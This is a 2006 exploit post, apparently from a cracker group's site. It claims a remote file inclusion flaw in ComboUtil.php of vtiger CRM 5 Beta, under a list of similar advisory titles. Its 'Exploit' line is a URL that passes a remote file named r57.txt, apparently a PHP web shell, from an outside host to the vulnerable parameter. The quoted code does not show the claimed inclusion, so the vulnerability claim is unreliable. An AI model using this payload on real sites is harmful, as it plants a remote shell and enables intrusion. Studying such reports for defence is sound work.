Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

WebspotBlogging => 3.0 Remote File Include Vulnerabilities

DanPHPSupport => 0.5 Cross Site Scripting Vulnerabilities

QB ( QuickBlogger ) =>1.4 Remote File Include Vulnerabilities

php_news => 2.0 Remote File Include Vulnerabilities

From:	crackers child <crackerscomputer_(at)_gmail.com>
Date:	27.09.2006
Subject:	vtiger CRM 5 Beta Remote File Include Vulnerability

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : vtiger CRM 5 Beta Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com


-------------------------
-------------------------------------------------------

Download :  http://vtiger.com
--------------------------------------------------------------------------------

Bug in ComboUtil.php


require_once('include/database/PearDatabase.php');
function getComboArray($combofieldNames)

--------------------------------------------------------------------------------


Exploit:

http://www.site.com/vtiger_path/include/ComboUtil.php?combofieldNames=http:
//siberaktif.net/r57.txt
?


--------------------------------------------------------------------------------